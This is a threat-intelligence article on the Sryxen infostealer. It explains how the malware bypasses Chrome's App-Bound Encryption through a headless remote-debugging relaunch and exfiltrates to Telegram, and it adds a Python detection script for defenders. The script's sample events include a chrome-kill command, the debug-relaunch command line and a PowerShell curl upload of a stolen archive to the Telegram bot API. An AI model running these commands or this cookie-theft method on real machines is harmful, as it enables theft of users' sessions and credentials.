A new information stealer, dubbed “Sryxen,” has emerged in the underground malware market, employing sophisticated techniques to bypass recent security enhancements in Google Chrome. This C++-based threat, sold as Malware-as-a-Service, specifically targets Windows systems, demonstrating an evolving approach to harvesting sensitive browser credentials. The malware’s innovative strategy allows it to circumvent Chrome’s App-Bound Encryption, a protection measure introduced to safeguard user data.
Sryxen operates as a rapid credential harvesting tool designed for quick deployment and immediate data exfiltration, without the need to establish persistence on an infected machine. This approach prioritizes speed and stealth. Its primary target is Chrome version 127 and newer, where Google implemented App-Bound Encryption to secure cookies and other sensitive browser information. Rather than seeking to brute-force or crack this encryption, Sryxen ingeniously leverages the browser’s own functionalities.
Sryxen’s Chrome Encryption Bypass Mechanism
The most notable feature of Sryxen is its method for stealing Chrome cookies that are protected by App-Bound Encryption. According to security researchers at DeceptIQ, when the malware detects Chrome version 127 or higher, it abandons traditional database extraction techniques. Instead, it first terminates any active Chrome processes. Following this, it re-launches Chrome with specific command-line arguments: `--headless`, `--remote-debugging-port`, and `--user-data-dir`. These flags enable remote debugging capabilities without any visible user interface, allowing the malware to operate unseen.
Once Chrome is launched in this headless, remotely debuggable state, Sryxen connects to the debugging port via a WebSocket. It then issues a DevTools Protocol command, specifically the `Network.getAllCookies` method. This command requests all cookies stored by the browser. Chrome processes this request internally, utilizing its App-Bound Encryption key to decrypt the cookie data before returning the plaintext information to the Sryxen stealer program. Crucially, these decrypted cookies do not touch the disk, rendering file-based monitoring solutions ineffective.
After successfully obtaining the decrypted cookie data, Sryxen terminates the Chrome process. It then proceeds to harvest other browser-related information, including saved passwords and cryptocurrency wallet data. Finally, it compresses all the collected sensitive information into an archive. This archive is then uploaded to a Telegram bot controlled by the attackers, typically using `curl` commands executed through PowerShell, facilitating rapid exfiltration and attacker control.
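Because the decrypted cookies never touch the disk, the detection opportunity described above lies in process telemetry rather than file monitoring: a non-browser parent killing Chrome and immediately relaunching it with the three debugging flags, followed by a `curl` upload to the Telegram bot API from PowerShell. The following is an added detection sketch, not code from DeceptIQ or from the malware. The events are constructed here in the shape of Sysmon Event ID 1 (process creation) records (`UtcTime`, `Image`, `ParentImage`, `CommandLine`); the parent binary `setup_tool.exe`, the user paths and the bot-token placeholder are invented, and the Chrome termination is modelled as a `taskkill` invocation, which is an assumption (the report only says Chrome is terminated, so a termination via API would instead show up as a Sysmon Event ID 5 for `chrome.exe`).

```python
"""Detect the kill-and-relaunch-with-remote-debugging pattern and the Telegram
curl exfiltration over process-creation events. Added example; event records are
constructed below, not real telemetry."""
import re
from datetime import datetime, timedelta

# The three flags the report names on the relaunched chrome.exe command line.
# --remote-debugging-port alone is also used by developers and test harnesses,
# so the score grows with the number of signature flags and with the
# kill-then-relaunch correlation rather than firing on one flag.
DEBUG_RELAUNCH_FLAGS = {"--headless", "--remote-debugging-port", "--user-data-dir"}

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
STEALER = r"C:\Users\alice\Downloads\setup_tool.exe"  # hypothetical parent binary

# Constructed sample events (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"UtcTime": "2025-01-15 10:00:00", "Image": CHROME, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{CHROME}"'},  # normal user launch
    {"UtcTime": "2025-01-15 10:05:01", "Image": r"C:\Windows\System32\taskkill.exe", "ParentImage": STEALER,
     "CommandLine": "taskkill /F /IM chrome.exe"},  # assumed termination method
    {"UtcTime": "2025-01-15 10:05:03", "Image": CHROME, "ParentImage": STEALER,
     "CommandLine": f'"{CHROME}" --headless --remote-debugging-port=9222 '
                    r'--user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data"'},
    {"UtcTime": "2025-01-15 10:05:20", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": STEALER,
     "CommandLine": r'powershell.exe -c "curl.exe -F document=@C:\Users\alice\AppData\Local\Temp\a.zip '
                    r'https://api.telegram.org/bot<BOT_TOKEN_PLACEHOLDER>/sendDocument"'},
    {"UtcTime": "2025-01-15 11:30:00", "Image": CHROME,
     "ParentImage": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": f'"{CHROME}" --remote-debugging-port=9222'},  # developer tooling, benign
]

FLAG_RE = re.compile(r"(?<!\S)(--[a-z0-9-]+)")  # --flag names, values after '=' dropped


def chrome_flags(command_line):
    """Return the set of --flag names present on a command line (lower-cased)."""
    return set(FLAG_RE.findall(command_line.lower()))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect_debug_relaunch(events, window=timedelta(seconds=30)):
    """Score chrome.exe launches that carry --remote-debugging-port.

    +1 per signature flag present (max 3); +1 if the same parent process ran
    taskkill against chrome.exe within `window` before the launch.
    """
    kills = [e for e in events if basename(e["Image"]) == "taskkill.exe"
             and "chrome.exe" in e["CommandLine"].lower()]
    findings = []
    for e in events:
        if basename(e["Image"]) != "chrome.exe":
            continue
        hits = chrome_flags(e["CommandLine"]) & DEBUG_RELAUNCH_FLAGS
        if "--remote-debugging-port" not in hits:
            continue
        score = len(hits)
        t = parse_time(e["UtcTime"])
        if any(k["ParentImage"] == e["ParentImage"]
               and timedelta(0) <= t - parse_time(k["UtcTime"]) <= window for k in kills):
            score += 1
        findings.append({"time": e["UtcTime"], "parent": e["ParentImage"],
                         "flags": sorted(hits), "score": score})
    return findings


def detect_telegram_exfil(events):
    """Flag curl invocations whose command line targets the Telegram bot API."""
    return [{"time": e["UtcTime"], "parent": e["ParentImage"], "image": e["Image"]}
            for e in events
            if "api.telegram.org/bot" in e["CommandLine"].lower()
            and "curl" in e["CommandLine"].lower()]


def analyze(events, threshold=3):
    """Run both detections; relaunch findings at or above `threshold` become alerts."""
    relaunch = detect_debug_relaunch(events)
    return {"debug_relaunch": relaunch,
            "alerts": [f for f in relaunch if f["score"] >= threshold],
            "exfil": detect_telegram_exfil(events)}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for a in result["alerts"]:
        print(f"ALERT relaunch {a['time']} parent={a['parent']} flags={a['flags']} score={a['score']}")
    for x in result["exfil"]:
        print(f"ALERT telegram upload {x['time']} parent={x['parent']}")
```

On the constructed sample the stealer's relaunch scores 4 (three flags plus the kill correlation) and alerts, while the developer's `--remote-debugging-port` launch scores 1 and stays below the threshold; the PowerShell `curl` upload is reported separately. The kill correlation keys on `ParentImage`, so a stealer that spawns the kill and the relaunch from different processes would need a process-tree join instead.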
Advanced Evasion Techniques
Beyond its innovative encryption bypass, Sryxen employs multiple layers of obfuscation and anti-analysis measures to evade detection. DeceptIQ researchers identified that the malware uses Vectored Exception Handling-based code encryption. This technique keeps the main malicious payload encrypted while at rest, only decrypting it during execution through the handling of specific exceptions. This makes static analysis, where code is examined without running it, significantly more challenging, as the malicious code appears as unintelligible data.
Furthermore, Sryxen implements a suite of six distinct anti-debugging checks. These checks include inspecting the `NtGlobalFlag` value in memory and analyzing the Process Environment Block (PEB). If any debugging tools are detected during these checks, the malware is programmed to terminate its execution immediately, preventing researchers from easily analyzing its behavior in a controlled environment.
The emergence of Sryxen highlights the continuous cat-and-mouse game between malware developers and browser security teams. While Google continues to bolster its defenses, threats like Sryxen demonstrate a persistent ability to adapt and find new avenues for exploitation. Users are advised to keep their browsers and operating systems updated to the latest versions and to exercise caution regarding suspicious links and downloads, as these often serve as initial infection vectors for such information-stealing malware.